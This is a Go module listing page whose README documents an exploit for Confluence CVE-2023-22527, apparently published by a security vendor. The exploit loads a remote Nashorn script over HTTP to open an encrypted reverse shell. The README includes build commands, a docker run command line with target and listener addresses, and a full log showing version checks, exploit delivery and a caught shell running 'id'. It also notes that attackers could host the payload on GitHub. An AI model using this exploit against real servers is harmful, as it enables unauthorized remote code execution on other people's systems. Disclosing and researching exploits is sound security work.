nashorn

command module

v0.0.0-...-1b4b94d Latest Latest Go to latest Published: Apr 17, 2024 License: Apache-2.0 Imports: 15 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/vulncheck-oss/cve-2023-22527

Links

Open Source Insights

README ¶

In Memory Confluence Nashorn Reverse Shell

This will establish our Nashorn reverse shell on a Confluence target (if Confluence is using a Java version below 15). This exploit uses the Nashorn 'load' keyword to fetch the go-exploit Nashorn script via HTTP (to bypass the OGNL expression size limit). In a real world attack, this script could be stored on GitHub or similar hosting to avoid having to host the payload yourself.

Compiling

To build a docker image:

make docker

If you have a Go build environment handy, you can also just use make:

albinolobster@mournland:~/cve-2023-22527/reverseshell$ make
gofmt -d -w cve-2023-22527.go 
golangci-lint run --fix cve-2023-22527.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-22527_linux-arm64 cve-2023-22527.go

Usage Example (Encrypted Reverse Shell)

^Calbinolobster@mournland:~/cve-2023-22527/nashorn$ sudo docker run -it --network=host nashorn -a -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.75 -lport 1270 -httpAddr 10.9.49.75
time=2024-03-05T16:54:28.674Z level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-03-05T16:54:28.746Z level=STATUS msg="Starting TLS listener on 10.9.49.75:1270"
time=2024-03-05T16:54:28.746Z level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8090 ssl=false "ssl auto"=true
time=2024-03-05T16:54:28.893Z level=STATUS msg="Validating Confluence target" host=10.9.49.88 port=8090
time=2024-03-05T16:54:29.095Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.88 port=8090 verified=true
time=2024-03-05T16:54:29.095Z level=STATUS msg="Running a version check on the remote target" host=10.9.49.88 port=8090
time=2024-03-05T16:54:29.213Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.88 port=8090 version=8.5.3
time=2024-03-05T16:54:29.213Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8090 vulnerable=yes
time=2024-03-05T16:54:29.213Z level=STATUS msg="HTTP server listening for 10.9.49.75:8080/OjvuCSACUpwc"
time=2024-03-05T16:54:31.214Z level=STATUS msg="Sending exploit to http://10.9.49.88:8090/template/aui/text-inline.vm"
time=2024-03-05T16:54:31.969Z level=STATUS msg="Sending payload"
time=2024-03-05T16:54:33.429Z level=SUCCESS msg="Caught new shell from 10.9.49.88:38856"
time=2024-03-05T16:54:33.429Z level=STATUS msg="Active shell from 10.9.49.88:38856"
id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)

Documentation ¶

There is no documentation for this package.

Source Files ¶

View all Source files

cve-2023-22527.go

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL